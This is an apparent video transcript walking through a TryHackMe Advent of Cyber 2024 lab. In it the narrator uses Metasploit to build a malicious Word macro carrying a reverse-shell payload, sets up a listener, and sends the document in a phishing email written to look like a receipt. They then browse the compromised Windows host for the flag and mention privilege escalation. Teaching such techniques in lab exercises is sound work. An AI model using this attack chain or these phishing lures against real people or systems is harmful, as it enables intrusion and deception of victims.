Hello everyone, welcome back to my channel InfoSec Lab, and today is another day of Advent of Cyber 2024 from TryHackMe, and we're gonna be doing another red team activity from today's room. If you remember from day number 8, we went over shell code and how to which is a malicious code that attackers created to inject into the to trick users or the victims into activating the code and then gain a reverse shell. In today's room, we're gonna be doing the same thing but under the different format. We're gonna be leverage macro, which is known as Microsoft Office feature that allows user to create a set of instructions to repeat certain tasks like formatting text or doing some calculations. Now this feature, the macros, this feature is available throughout Microsoft Office products like Microsoft Word, Excel, etc. In this scenario, we're gonna be using Microsoft Word as our main application or software to exploit. The concept is similar. It's the same. We first create a malicious code or the shell code, then we send it to the user, the target user, and trick them into executing the malicious code. And once the code is executed, a reverse shell will be created, which is a connection from the target machine back to your other machine. Alright, and then before diving into the activities, and I want to introduce you to Metasploit framework. Metasploit is very popular and well-known tool for penetration testers. It is a you can think of Metasploit as a large library of common attacks and payloads which are configured and ready for you to use. So if you know your attack, you know what vulnerabilities that they have on the target system, and then you know what kind of payload you want to create, then you can easily use Metasploit to actually prepare your attack. Alright, let's dive into Metasploit and see how it works. So first, to start it, we run the command nsf console. And just wait for a few minutes, it's gonna be startup. So I don't use Microsoft Word a lot, so I don't know exactly how the macro function works, but basically based on the information provided here, it's like, you go into Microsoft Word, click view, and then you click macro section icon right here, and then you're just gonna create this one. So the GUI is pretty simple and easy to understand. I would say that there should be no problem creating a regular macro. And the thing is, like, how the attack works is, as it's been explained in this room, when the malicious macro macro is downloaded onto the victim computer, and then when the victim opens the Microsoft Word in this case, then the malicious macro will automatically trigger it and then insert it into the common field, the common properties of the Word documents right here. As you can see right here, this is a base 64 encoded malicious code. And then when this one is injected into the commons property of the Microsoft Word, then it will automatically execute, and from then a reverse shell will be created and then connect back to your machine. That's the concept of what we are about to do. Let's go back to Metasploit. Now we can see that it's already set up. So now we know that the machine is gonna be a Windows machine, and the Microsoft Word is gonna be software, right? So first we have to set the payload that we want to use. First, the Windows machines, and second, a reverse shell TCP. So let's say set payload, and then Windows machines, interpreter, and then reverse TCP. Oh, there's a typo right here. Now you may ask, what is a interpreter? On a high level explanation, it is Metasploit reverse shell. That's it. is similar. It might have a slight difference between the regular shells, but like we're not gonna be dive deep into that for now. So let's continue with our attack. So now we have set the payload, and the next step is we have to set the kind of exploit we want to use, which we're gonna be using this command right here. So what does it do? Now this command tells Metasploit to use this exploit under the file format of the Office Word macro. Remember from day number 8, we try to inject the malicious code directly into the target's memory space and execute from the memory spaces. But here, like it's a different format. Like you are using the Microsoft Word macro function, so the format is gonna be .docm. That's the format of the macro. In regular cases, the format can be executable file, which is .exe, or on a Linux machine, it's gonna be an ELF extension file. So yeah, this is what we set. And if you're not sure what values to set, what input to set, you can run the command show options. It's gonna tell you everything. Okay, this is the name, the current settings right here. The file name is gonna be an msf.docm, the Office document macro file. Right now, what we're gonna have to set is the L host and the L port. Remember, if we want to create a connection from our from the target machine to our attacking machine, then we have to set our IP address and then the port number that we want the connection to take place. In this case, our IP address is, okay, let me see. Let's open a new tab. Our IP address is 10.10.81.30. So it's clear. Set lhost 10.10.81.30, and then we want to connect to port number 8888. Set lport attribute. Now we can run the show options, or options for short, should be fine. To double check all the settings on the values we have. Okay, lhost is set correctly, and then lport is also set correctly. What's next? Now all the settings are completed. We can just run exploit and wait for the few minutes, and the malicious code is gonna be created and stored in this location. We can actually go there and check. So cd, now we're in the root, right? So msf4 local, and then double check. Yes, the file is right here. Okay, let's move on to the next step. Now we have the payload. Now we're gonna have to set up a listener. How do we do that? Well, if you're not without Metasploit, the very simple command you use is gonna be ncat LNVP and then 888, the port number that you're listening on. It should be constantly listening on port 8888 for a connection request. But since now because we are trying to learn about Metasploit's framework, so let's try doing that within Metasploit. So in Metasploit, we try to use multi-handle, I believe, handler. Yes. And then again, if you're not sure what to do or what kind of values to set, you can always type options for every selection you select in Metasploit. Right here, it shows that, okay, the options. So it looks like the same two values that we have to provide: the L host, which is our attacking IP address, and then the port of the connection. Now make sure these two values match these two values right here. They have to be the same in order for the reverse shell to work. So set L host equals 110.10.81.30, and then set L port, the same thing. All right, let's double check our configurations one more time. Okay, everything looks good. Let's start listening on this port. Running exploit. Now, on our attacking machine, Metasploit is actually listening on a port 8888 and waiting for any request connections from the target machine. Now our side has completed, we have prepared on our side. Now let's try to deliver our payload to the victim and then try to have them execute the malicious payload. First of all, we have to change the file name right here. Well, MSF doesn't sound very convincing and legitimate to a regular user, so we're gonna change it to something that's more convincing, like receipt or order or a report. For example, in this case, I'm gonna be using receipt. So copy MSF dot and then you see. I mean, we can just move it to. Let's just leave it here. Should be fine. Okay, what's next? We are told to go to the following server, mail server. This one. And then this is gonna be the email address that we're gonna be targeting. Let's log in with the credentials on the mail server first. Yes, Merry Christmas. Now we're gonna be copying the victim's email address. Not now, don't want to save it. Nope. Okay, receipt for order 1P, some random characters. Hello, Martha. Below is the receipt for your purchase on well, as an attacker, you have to be carefully proofread your emails. Purchase, because otherwise people are gonna say, "Oh, you don't." Attackers, phishing emails gonna be like having a ton of typo errors, and then that's one of the indicators that this is a phishing email, not a legitimate one. So we have to grab our our email carefully and then make it look like it's real. Okay, below is the receipt for your purchase from TryHackMe. Please feel free to reach out to us if you have any questions. Best regards. TryHackMe sales team. Let's just make it this way. I know it doesn't have to be precise, but it's not important right now. Okay, so now we go to the root folder, but we don't see the .msf folder. That's because it's hidden, and in order to show that, you press Ctrl H. It's gonna be show all the hidden file and folders. Looking for .msf4. Where is it? Are we? Yeah, we are. Right here, this one. And then inside this one, we're gonna be going to local, and then we're gonna be using there's a typo. No, we don't want to do that. I mean, for the sake of this exercise, I'll just ignore that. But in reality, if you really perform a real attack, you shouldn't be having a typo. Open. Now again, this is very a real indicator that this email is fake and then malicious because the typo in the document. Alright, so that's one of telltales that for people to look for when they see an email with attachment. Now, when everything's ready, just click send. And then according to TryHackMe, it's gonna take a few minutes for the payload to execute it. And then once it's successful, then we should see a connection back to our machine right here. Alright, so while we wait for the connection, let's start. Let's go over some comparisons with the payloads that we created so far. Remember, okay, let me pull up this one first. Let's wait for this one. Oh, the shell is created. The connection has been established. Okay, I'm going to go over the difference between the Metasploit payload and then the regular payload in a few minutes. For now, let's focus on the exercise. So now we have created a reverse shell, which is the connection to our target machine. We can now run several Linux commands, ls, to see what it is on the target machine. Oh, we see a lot. Scrolling up, it looks like we are in some kind of photo system. Okay, let's clear it and run pwd. We are in Windows System 32. So this is a Windows machine. So let's go to CD C drive and then pwd. Oh no, CD C. You know what? Just go straight to the administrator folder. So C CDC users. Are we here? Yes, we are here. So let's see what kind of users we have. We have administrators, we have default user, public desktop. So we're interested in the administrator. Let's go there. Admin. CD desktop. Okay, we see the flag on the desktop, right? Let's see the content of the flag. TryHackMe Fishing Christmas. That's gonna be the flag for today's room, which is here. So that's it for the room today. I mean, at this point, we have successfully get a hold on the target machine. In real life scenario, once we get onto this machine, we want to do more reconnaissance, more enumerations on these target machines to see what it actually has, and then what kind of network configurations or what kind of vulnerabilities that this target machine has, and what we can use from this target machine to leverage for further attack. Like what kind, we can do several commands like who am I to see. I don't know why. Run ID. Okay, what kind of IDs we have? Oh, we can use the get system command right here to try to elevate your privilege onto the target system. I'm not gonna be running these commands because it's gonna be out of scope of this room, but in reality, you're gonna be running a few commands to enumerate to enumerate the machines and then try to escalate the privilege of the user to see if you can perform any more to see if you can leverage any more further attacks into the system. It's called moving lateral in the system, and then privilege escalation is moving up the system. You try to get a hold of the users with more administrative permission. Okay. Well, in this case, because you're already in the administrator, so it is assumed that you have the full control of the whole system right away. All right, so let's exit this one and let's go back to whatever we did earlier and try to recap what we learned today. So, as mentioned earlier, this exploit multi-handler allows us to set up a listener on our attacking machine. Without Metasploit, this is what you do in date number 8, which is NCAT LMVP, and then 888. Basically, these two do exactly the same thing. You set up a listener on port 8888, and then waiting for a connection request from the target machine. What else? If you recall from day number 8, we tried to create a malicious shellcode, right? What was the command? We use msf window, and then we specify the Windows platform, which is, we also specify the architecture of the machine. What else was it? It was, I'm gonna put it up. Bear with me for a second. 8 MSF. Okay, shell reverse TCP. All right, and then L host, and then it's gonna be L host 10.10.81.30, and then L port is a. So everything is similar to what we did over here, which is no, not this one. Okay, so everything from msfvenom.p, the payload right here, up to this point, is equivalent to what we did right here earlier today. Window interpreter reverse shell. Again, the type of shell is a little bit different, but the concept is the same. All right, and then what's next in the command? What do? We select an exploit, right? And what we use exploit multi-format macro. Use this one, and then show options. So when we use this one in Metasploit, this command is equivalent to this command when we are not using Metasploit. .f and then .doc. So what it tells you to do is using this kind of format to store your malicious code, which is equivalent to this part of the command right here, f, the file format, and then which is .m. And then during this part, you have to set the L host value, the L port value, which is similar to this one. You set the L host value to equals to, sorry, I was missing the equal. Okay, and then if we want to save it in a file name, we can just do the output and receive yeah, DOCA. And just wait for it for a few moments. It's gonna be create the same payload. Oh, Oops. This is not what I expected to be. Format values. Okay, so I guess it doesn't have the options for you to create the payload within the format of docm. Okay, my bad right there. I thought I was able to create a file format using the regular MSFNO. So I guess that's why we had to use the Metasploit in this case. But anyway, that's it for today's room, and then I hope you don't mind my little mistakes at the end of this video. And if you like my video and content, please feel free to subscribe and click the like button. I also have a write-up for this room, which I'll link in the descriptions. And if you want to refer back to date number 8 of Advent of Cybersecurity, Advent of Cyber 2024, you can just click also the link below. I'll link that to date number 8. And thank you very much. See you. Bye.